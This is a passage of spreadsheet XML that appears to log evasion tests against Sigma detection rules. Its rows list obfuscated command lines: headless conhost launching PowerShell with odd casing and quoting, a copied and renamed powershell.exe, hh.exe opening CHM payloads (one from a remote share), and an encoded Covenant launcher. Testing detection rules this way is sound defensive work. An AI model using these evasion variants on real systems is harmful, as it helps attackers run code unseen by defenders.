      <c r="C1206" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1206" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1206" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdLEss pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1206" s="43" t="n"/>
      <c r="J1206" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1206" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1207" ht="15.75" customHeight="1" s="42">
      <c r="A1207" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1207" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1207" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1207" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1207" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1207" s="43" t="n"/>
      <c r="J1207" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1207" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1208" ht="15.75" customHeight="1" s="42">
      <c r="A1208" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1208" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1208" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1208" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1208" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1208" s="43" t="n"/>
      <c r="J1208" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1208" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1209" ht="15.75" customHeight="1" s="42">
      <c r="A1209" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1209" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1209" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1209" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1209" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1209" s="43" t="n"/>
      <c r="J1209" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1209" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1210" ht="15.75" customHeight="1" s="42">
      <c r="A1210" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1210" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1210" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1210" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1210" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlESs pwsh.exe -cOmMand "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1210" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1210" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1210" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1210" s="36" t="n"/>
      <c r="J1210" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1210" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1211" ht="15.75" customHeight="1" s="42">
      <c r="A1211" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1211" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1211" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1211" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1211" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1211" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1211" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1211" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1211" s="36" t="n"/>
      <c r="J1211" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1211" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1212" ht="15.75" customHeight="1" s="42">
      <c r="A1212" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1212" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1212" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1212" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1212" s="36" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmmAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1212" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1212" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1212" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1212" s="36" t="n"/>
      <c r="J1212" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1212" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1213" ht="15.75" customHeight="1" s="42">
      <c r="A1213" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1213" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1213" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1213" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1213" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --headless C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1213" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1213" s="36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1213" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1213" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1214" ht="15.75" customHeight="1" s="42">
      <c r="A1214" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1214" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1214" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1214" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1214" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe -"-headless" C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1214" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1214" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1214" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1214" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1215" ht="15.75" customHeight="1" s="42">
      <c r="A1215" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1215" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1215" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1215" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1215" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEADlEsS C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1215" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1215" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1215" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1215" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1216" ht="15.75" customHeight="1" s="42">
      <c r="A1216" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1216" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1216" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1216" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1216" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe /"-headless" C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1216" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1216" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1216" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1216" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1216" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1216" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1217" ht="15.75" customHeight="1" s="42">
      <c r="A1217" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1217" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1217" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1217" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1217" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --HeADLeSS C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1217" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1217" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1217" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1217" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1217" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1217" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1218" ht="15.75" customHeight="1" s="42">
      <c r="A1218" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1218" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1218" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1218" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1218" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEAdlESS C:\Temp\sys.exe -CommAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1218" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1218" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1218" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1218" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1218" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1218" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1219" ht="15.75" customHeight="1" s="42">
      <c r="A1219" s="43" t="n"/>
      <c r="B1219" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1219" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1219" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1219" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1219" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1219" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1219" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1219" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1219" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1219" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1220" ht="15.75" customHeight="1" s="42">
      <c r="A1220" s="43" t="n"/>
      <c r="B1220" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1220" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1220" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1220" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1220" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1220" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1220" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1220" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1220" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1220" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1221" ht="15.75" customHeight="1" s="42">
      <c r="A1221" s="43" t="n"/>
      <c r="B1221" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1221" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1221" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1221" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1221" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1221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221" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1221" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1222" ht="15.75" customHeight="1" s="42">
      <c r="A1222" s="43" t="n"/>
      <c r="B1222" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1222" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1222" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1222" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1222" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1222" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1222" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1222" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1222" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1222" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1223" ht="15.75" customHeight="1" s="42">
      <c r="A1223" s="43" t="n"/>
      <c r="B1223" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1223" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1223" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1223" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1223" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1223" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1223" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1223" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1223" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1224" ht="15.75" customHeight="1" s="42">
      <c r="A1224" s="43" t="n"/>
      <c r="B1224" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1224" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1224" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1224" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1224" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1224" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1224" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1224" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1224" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1225" ht="15.75" customHeight="1" s="42">
      <c r="A1225" s="43" t="n"/>
      <c r="B1225" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1225" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1225" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1225" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1225" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1225" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1225" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1225" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1225" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1226" ht="15.75" customHeight="1" s="42">
      <c r="A1226" s="43" t="n"/>
      <c r="B1226" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1226" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1226" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1226" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1226" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1226" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1226" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1226" s="43" t="n"/>
      <c r="J1226" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1226" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1227" ht="15.75" customHeight="1" s="42">
      <c r="A1227" s="43" t="n"/>
      <c r="B1227" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1227" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1227" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1227" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1227" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1227" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1227" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1227" s="43" t="n"/>
      <c r="J1227" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1227" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1228" ht="15.75" customHeight="1" s="42">
      <c r="A1228" s="43" t="n"/>
      <c r="B1228" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1228" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1228" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1228" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1228" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1228" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1228" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1228" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1228" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1228" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1229" ht="15.75" customHeight="1" s="42">
      <c r="A1229" s="43" t="n"/>
      <c r="B1229" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1229" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1229" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1229" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1229" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1229" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1229" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1229" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1229" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1230" ht="15.75" customHeight="1" s="42">
      <c r="A1230" s="43" t="n"/>
      <c r="B1230" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1230" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1230" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1230" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1230" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1230" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1230" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1230" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1230" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1231" ht="15.75" customHeight="1" s="42">
      <c r="A1231" s="43" t="n"/>
      <c r="B1231" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1231" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1231" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1231" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1231" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1231" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1231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231" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1231" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1232" ht="15.75" customHeight="1" s="42">
      <c r="A1232" s="43" t="n"/>
      <c r="B1232" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1232" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1232" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1232" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -e cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F1232" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1232" s="36" t="b">
        <v>1</v>
      </c>
